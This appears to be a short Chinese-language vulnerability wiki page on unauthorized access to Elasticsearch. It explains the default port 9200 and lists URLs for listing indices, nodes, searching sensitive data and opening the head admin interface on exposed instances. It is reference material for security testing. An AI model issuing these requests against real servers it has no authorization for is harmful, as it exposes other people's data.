menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right Elasticsearch chevron_right Elasticsearch 未授权访问.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Elasticsearch 未授权访问.md
    563 B / 2021-07-04 06:01:08
        # Elasticsearch 未授权访问

## 漏洞描述

Elasticsearch是用Java开发的企业级搜索引擎,默认端口9200,存在未授权访问漏洞时,可被非法操作数据

## 漏洞影响

> [!NOTE]
>
> Elasticsearch

## 漏洞复现

访问目标URL : http://xxx.xxx.xxx.xxx:9200/_node



```
http://localhost:9200/_cat/indices
http://localhost:9200/_river/_search //查看数据库敏感信息
http://localhost:9200/_nodes         //查看节点数据
http://localhost:9200/_plugin/head/  //web管理界面(head插件)
```
    links
    file_download